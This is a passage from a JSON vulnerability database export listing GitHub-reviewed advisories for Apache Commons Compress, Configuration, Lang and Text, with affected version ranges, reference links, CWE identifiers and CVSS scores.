"https://lists.apache.org/thread.html/rdd5412a5b9a25aed2a02c3317052d38a97128314d50bc1ed36e81d38@%3Cuser.ant.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf2f4d7940371a7c7c5b679f50e28fc7fcc82cd00670ced87e013ac88@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf3f0a09fee197168a813966c5816157f6c600a47313a0d6813148ea6@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf93b6bb267580e01deb7f3696f7eaca00a290c66189a658cf7230a1a@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20211022-0001" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0e87177f8e78b4ee453cd4d3d8f4ddec6f10d2c27707dd71e12cafc9@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25f4c44616045085bc3cf901bb7e68e445eee53d1966fc08998fc456@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3227b1287e5bd8db6523b862c22676b046ad8f4fc96433225f46a2bd@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4f03c5de923e3f2a8c316248681258125140514ef3307bfe1538e1ab@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54049b66afbca766b6763c7531e9fe7a20293a112bcb65462a134949@%3Ccommits.drill.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75ffc7a461e7e7ae77690fa75bd47bb71365c732e0fbcc44da4f8ff5@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9a23d4dbf4e34d498664080bff59f2893b855eb16dae33e4aa92fa53@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab292091eadd1ecc63c516e9541a7f241091cf2e652b8185a6059945@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5fa2ee61828fa2e42361b58468717e84902dd71c4aea8dc0b865df7@%3Cnotifications.james.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/6" } ], "database_specific": { "cwe_ids": [ "CWE-130" ], "github_reviewed": true, "github_reviewed_at": 
"2021-07-14T19:37:10Z", "nvd_published_at": "2021-07-13T08:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xqfj-vm6h-2x34", "published": "2021-08-02T16:55:39Z", "modified": "2024-03-08T05:19:25.295269Z", "aliases": [ "CVE-2021-35517" ], "summary": "Improper Handling of Length Parameter Inconsistency in Compress", "details": "When reading a specially crafted TAR archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' tar package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.21" } ] } ], "versions": [ "1.0", "1.1", "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.18", "1.19", "1.2", "1.20", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-xqfj-vm6h-2x34/GHSA-xqfj-vm6h-2x34.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35517" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20211022-0001" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra393ffdc7c90a4a37ea023946f390285693795013a642d80fba20203@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r605d906b710b95f1bbe0036a53ac6968f667f2c249b6fbabada9a940%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54afdab05e01de970649c2d91a993f68a6b00cd73e6e34e16c832d46@%3Cuser.ant.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r457b2ed564860996b20d938566fe8bd4bfb7c37be8e205448ccb5975@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31f75743ac173b0a606f8ea6ea53f351f386c44e7bcf78ae04007c29@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-compress/security-reports.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/3" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/5" } ], "database_specific": { "cwe_ids": [ "CWE-130", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2021-07-14T18:12:57Z", "nvd_published_at": "2021-07-13T08:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7qx4-pp76-vrqh", "published": "2020-05-21T19:08:08Z", "modified": "2023-11-08T04:02:46.926629Z", "aliases": [ "CVE-2020-1953" ], "summary": "Remote code execution in Apache Commons Configuration", "details": "Apache Commons Configuration uses a third-party library to parse YAML files which by default allows the instantiation of classes if the YAML includes special statements. Apache Commons Configuration versions 2.2, 2.3, 2.4, 2.5, 2.6 did not change the default settings of this library. 
So if a YAML file was loaded from an untrusted source, it could therefore load and execute code out of the control of the host application.", "affected": [ { "package": { "name": "org.apache.commons:commons-configuration2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-configuration2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.2" }, { "fixed": "2.7" } ] } ], "versions": [ "2.2", "2.3", "2.4", "2.5", "2.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-7qx4-pp76-vrqh/GHSA-7qx4-pp76-vrqh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1953" }, { "type": "WEB", "url": "https://github.com/apache/commons-configuration/commit/add7375cf37fd316d4838c6c56b054fc293b4641" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d0e00f2e147a9e9b13a6829133092f349b2882bf6860397368a52600@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r16a2e949e35780c8974cf66104e812410f3904f752df6b66bf292269@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rde2186ad6ac0d6ed8d51af7509244adcf1ce0f9a3b7e1d1dd3b64676@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-05-21T17:12:19Z", "nvd_published_at": "2020-03-13T15:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9w38-p64v-xpmv", "published": "2024-03-21T09:31:14Z", "modified": "2025-02-13T19:13:50.673769Z", "aliases": [ "CGA-4phw-5934-cp4w", "CVE-2024-29133" ], "related": [ "CGA-9pcx-658r-q6cc", "CGA-f8w3-v8cw-rc4q", "CGA-gxrv-2q36-c76g", "CGA-p5h5-jmpp-wgq6" ], 
"summary": "Apache Commons Configuration: StackOverflowError calling ListDelimiterHandler.flatten(Object, int) with a cyclical object tree", "details": "This Out-of-bounds Write vulnerability in Apache Commons Configuration affects Apache Commons Configuration: from 2.0 before 2.10.1. User can see this as a 'StackOverflowError' calling 'ListDelimiterHandler.flatten(Object, int)' with a cyclical object tree.\nUsers are recommended to upgrade to version 2.10.1, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-configuration2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-configuration2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "fixed": "2.10.1" } ] } ], "versions": [ "2.0", "2.1", "2.1.1", "2.10.0", "2.2", "2.3", "2.4", "2.5", "2.6", "2.7", "2.8.0", "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-9w38-p64v-xpmv/GHSA-9w38-p64v-xpmv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29133" }, { "type": "WEB", "url": "https://github.com/apache/commons-configuration/commit/43f4dab021e9acb8db390db2ae80aa0cee4f9ee4" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/CONFIGURATION-841" }, { "type": "WEB", "url": "https://lists.apache.org/thread/ccb9w15bscznh6tnp3wsvrrj9crbszh2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNKDKEEKZNL5FGCTZKJ6CFXFVWFL5FJ7" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YD4AFTIIQW662LUAQRMWS6BBKYSZG3YS" }, { "type": "PACKAGE", "url": "apache/commons-configuration" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/03/20/3" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, 
"github_reviewed_at": "2024-03-21T18:59:08Z", "nvd_published_at": "2024-03-21T09:15:07Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xj57-8qj4-c4m6", "published": "2022-07-07T00:00:26Z", "modified": "2024-02-17T05:33:18.672687Z", "aliases": [ "CVE-2022-33980" ], "summary": "Code injection in Apache Commons Configuration", "details": "Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation. Starting with version 2.4 and continuing through 2.7, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. 
Users are recommended to upgrade to Apache Commons Configuration 2.8.0, which disables the problematic interpolators by default.", "affected": [ { "package": { "name": "org.apache.commons:commons-configuration2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-configuration2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.4" }, { "fixed": "2.8.0" } ] } ], "versions": [ "2.4", "2.5", "2.6", "2.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-xj57-8qj4-c4m6/GHSA-xj57-8qj4-c4m6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33980" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-configuration/changes-report.html#a2.8.0" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-configuration" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/CONFIGURATION-753" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/CONFIGURATION-764" }, { "type": "WEB", "url": "https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221028-0015" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5290" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/06/5" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/11/15/4" } ], "database_specific": { "cwe_ids": [ "CWE-74" ], "github_reviewed": true, "github_reviewed_at": "2022-07-07T16:56:07Z", "nvd_published_at": "2022-07-06T13:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xjp4-hw94-mvp5", "published": "2024-03-21T09:31:14Z", "modified": "2025-02-13T19:12:42.244592Z", "aliases": [ "CGA-6jvc-fmj8-g22f", "CVE-2024-29131" ], "related": [ 
"CGA-2v4p-jwqh-9wqp", "CGA-grw7-f4vj-7jvv", "CGA-pg3h-88pr-x67h", "CGA-qh6m-p54c-m273" ], "summary": "Apache Commons Configuration: StackOverflowError adding property in AbstractListDelimiterHandler.flattenIterator()", "details": "This Out-of-bounds Write vulnerability in Apache Commons Configuration affects Apache Commons Configuration: from 2.0 before 2.10.1. User can see this as a 'StackOverflowError' when adding a property in 'AbstractListDelimiterHandler.flattenIterator()'.\nUsers are recommended to upgrade to version 2.10.1, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-configuration2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-configuration2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "fixed": "2.10.1" } ] } ], "versions": [ "2.0", "2.1", "2.1.1", "2.10.0", "2.2", "2.3", "2.4", "2.5", "2.6", "2.7", "2.8.0", "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-xjp4-hw94-mvp5/GHSA-xjp4-hw94-mvp5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29131" }, { "type": "WEB", "url": "https://github.com/apache/commons-configuration/commit/56b5c4dcdffbde27870df5a3105d6a5f9b22f554" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-configuration" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/CONFIGURATION-840" }, { "type": "WEB", "url": "https://lists.apache.org/thread/03nzzzjn4oknyw5y0871tw7ltj0t3r37" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNKDKEEKZNL5FGCTZKJ6CFXFVWFL5FJ7" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YD4AFTIIQW662LUAQRMWS6BBKYSZG3YS" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241213-0001" }, 
{ "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/03/20/4" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2024-03-21T18:58:52Z", "nvd_published_at": "2024-03-21T09:15:07Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j288-q9x7-2f5v", "published": "2025-07-11T15:31:37Z", "modified": "2025-11-05T20:34:04.566048Z", "aliases": [ "CVE-2025-48924" ], "related": [ "CGA-22cr-f3cr-c7cm", "CGA-29x5-f7v5-rrg6", "CGA-2fmr-p6rq-h6gj", "CGA-48h5-566h-rvpp", "CGA-4fcv-jq36-r7hx", "CGA-523g-m72h-8798", "CGA-6pxc-gq99-gpx4", "CGA-6v52-24xf-x875", "CGA-78fw-62xf-9rm8", "CGA-7r2r-4fw7-h3qv", "CGA-8c99-22mx-hg38", "CGA-8w2x-v747-c9c7", "CGA-8x43-fp55-w32w", "CGA-9j28-2jv5-qv67", "CGA-9rcm-4h29-rv8h", "CGA-ff3x-mc4g-82q2", "CGA-g3gg-7c6f-x6qx", "CGA-hj53-w7gr-6f9r", "CGA-j6cx-9v8j-x9cc", "CGA-j84p-prch-g8wm", "CGA-j8w2-rj92-x353", "CGA-j93m-mcxv-7hxr", "CGA-jvxv-2xch-6xjm", "CGA-m7pc-jwx3-vm7v", "CGA-mhg4-342v-w7xq", "CGA-mp4q-mrjj-8862", "CGA-p7fm-p736-2fmc", "CGA-p87f-qfxg-x45v", "CGA-pxx2-65vr-8cc4", "CGA-rc28-932p-89cv", "CGA-v52f-47gw-2xcm", "CGA-vxhq-8vpg-mr2p" ], "summary": "Apache Commons Lang is vulnerable to Uncontrolled Recursion when processing long inputs", "details": "Uncontrolled Recursion vulnerability in Apache Commons Lang.\n\nThis issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0.\n\nThe methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. 
Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop.\n\nUsers are recommended to upgrade to version 3.18.0, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-lang3", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-lang3" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0" }, { "fixed": "3.18.0" } ] } ], "versions": [ "3.0", "3.0.1", "3.1", "3.10", "3.11", "3.12.0", "3.13.0", "3.14.0", "3.15.0", "3.16.0", "3.17.0", "3.2", "3.2.1", "3.3", "3.3.1", "3.3.2", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } }, { "package": { "name": "commons-lang:commons-lang", "ecosystem": "Maven", "purl": "pkg:maven/commons-lang/commons-lang" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "last_affected": "2.6" } ] } ], "versions": [ "2.0", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48924" }, { "type": "WEB", "url": "https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-lang" }, { "type": "WEB", "url": "https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00000.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00032.html" }, { "type": "WEB", 
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00036.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/07/11/1" } ], "database_specific": { "cwe_ids": [ "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2025-07-12T00:48:03Z", "nvd_published_at": "2025-07-11T15:15:24Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-599f-7c49-w659", "published": "2022-10-13T19:00:17Z", "modified": "2024-02-16T08:09:06.872889Z", "aliases": [ "CVE-2022-42889" ], "summary": "Arbitrary code execution in Apache Commons Text", "details": "Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. 
Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.", "affected": [ { "package": { "name": "org.apache.commons:commons-text", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-text" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.5" }, { "fixed": "1.10.0" } ] } ], "versions": [ "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-599f-7c49-w659/GHSA-599f-7c49-w659.json" } }, { "package": { "name": "com.guicedee.services:commons-text", "ecosystem": "Maven", "purl": "pkg:maven/com.guicedee.services/commons-text" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.2.2.1-jre17" } ] } ], "versions": [ "0.70.0.1", "0.70.0.1-rc1", "0.70.0.1-rc13", "0.70.0.1-rc14", "0.70.0.1-rc15", "0.70.0.1-rc2", "0.70.0.1-rc3", "0.70.0.1-rc4", "0.70.0.1-rc5", "0.70.0.2", "0.70.0.3", "0.70.0.4", "0.70.0.5", "0.70.0.6", "0.70.0.7", "1.0.0.0", "1.0.1.0", "1.0.1.0-jre12", "1.0.1.0-jre13", "1.0.1.0-jre8", "1.0.1.1", "1.0.1.1-jre12", "1.0.1.1-jre13", "1.0.1.1-jre8", "1.0.1.2", "1.0.1.3", "1.0.1.3-jre12", "1.0.1.3-jre13", "1.0.1.3-jre8", "1.0.1.4", "1.0.1.4-jre12", "1.0.1.4-jre13", "1.0.1.4-jre8", "1.0.1.5", "1.0.1.5-jre12", "1.0.1.5-jre13", "1.0.1.5-jre8", "1.0.1.6", "1.0.1.6-jre12", "1.0.1.6-jre13", "1.0.1.7", "1.0.1.7-jre12", "1.0.1.7-jre13", "1.0.1.7-jre8", "1.0.10.0", "1.0.10.0-jre13", "1.0.10.0-jre14", "1.0.10.1", "1.0.10.1-jre14", "1.0.10.3", "1.0.10.3-jre14", "1.0.10.4", "1.0.10.4-jre12", "1.0.10.4-jre13", "1.0.10.4-jre14", "1.0.11.0-jre14", "1.0.11.2-jre14", "1.0.11.5", "1.0.11.5-jre12", "1.0.11.5-jre14", "1.0.11.6-jre14", "1.0.11.7", "1.0.11.7-jre12", "1.0.11.7-jre14", "1.0.12.0", "1.0.12.0-jre12", "1.0.12.0-jre13", "1.0.12.0-jre14", "1.0.12.0-jre8", "1.0.12.1", "1.0.12.1-jre12", "1.0.12.1-jre14", "1.0.12.2", "1.0.12.2-jre12", 
"1.0.12.2-jre14", "1.0.12.3", "1.0.12.3-jre12", "1.0.12.3-jre13", "1.0.12.3-jre14", "1.0.12.4", "1.0.12.4-jre12", "1.0.12.4-jre13", "1.0.12.4-jre14", "1.0.12.4-jre8", "1.0.12.5", "1.0.12.5-jre14", "1.0.13.0", "1.0.13.0-jre12", "1.0.13.0-jre13", "1.0.13.0-jre14", "1.0.13.0-jre8", "1.0.13.1", "1.0.13.1-jre13", "1.0.13.1-jre14", "1.0.13.1-jre8", "1.0.13.2", "1.0.13.2-jre12", "1.0.13.2-jre13", "1.0.13.2-jre14", "1.0.13.2-jre8", "1.0.13.3", "1.0.13.3-jre14", "1.0.13.4", "1.0.13.4-jre12", "1.0.13.4-jre13", "1.0.13.4-jre14", "1.0.13.5", "1.0.13.5-jre12", "1.0.13.5-jre14", "1.0.13.5-jre8", "1.0.14.0-RC1-jre14", "1.0.14.0-RC1-jre8", "1.0.14.1", "1.0.14.1-jre12", "1.0.14.1-jre13", "1.0.14.1-jre14", "1.0.14.1-jre8", "1.0.14.3-jre8", "1.0.14.4-jre14", "1.0.14.4-jre8", "1.0.15.1", "1.0.15.1-jre12", "1.0.15.1-jre13", "1.0.15.1-jre14", "1.0.15.1-jre8", "1.0.15.2", "1.0.15.2-jre12", "1.0.15.2-jre14", "1.0.15.2-jre8", "1.0.15.3-jre14", "1.0.15.3-jre8", "1.0.15.4", "1.0.15.4-jre14", "1.0.15.4-jre8", "1.0.15.5", "1.0.15.5-jre14", "1.0.15.5-jre8", "1.0.16.0", "1.0.16.0-jre14", "1.0.16.0-jre8", "1.0.17.0", "1.0.17.0-jre14", "1.0.17.1", "1.0.17.1-jre14", "1.0.17.1-jre8", "1.0.18.0", "1.0.18.0-jre14", "1.0.18.0-jre15", "1.0.18.0-jre8", "1.0.18.1", "1.0.18.1-jre14", "1.0.18.1-jre15", "1.0.18.1-jre8", "1.0.19.0", "1.0.19.0-jre14", "1.0.19.0-jre15", "1.0.19.1", "1.0.19.1-jre12", "1.0.19.1-jre13", "1.0.19.1-jre14", "1.0.19.1-jre15", "1.0.19.1-jre8", "1.0.19.10", "1.0.19.10-jre12", "1.0.19.10-jre14", "1.0.19.10-jre15", "1.0.19.10-jre8", "1.0.19.11", "1.0.19.11-jre14", "1.0.19.11-jre8", "1.0.19.12-jre14", "1.0.19.12-jre8", "1.0.19.13", "1.0.19.13-jre14", "1.0.19.13-jre15", "1.0.19.13-jre8", "1.0.19.2", "1.0.19.2-jre13", "1.0.19.2-jre14", "1.0.19.2-jre15", "1.0.19.2-jre8", "1.0.19.3", "1.0.19.3-jre13", 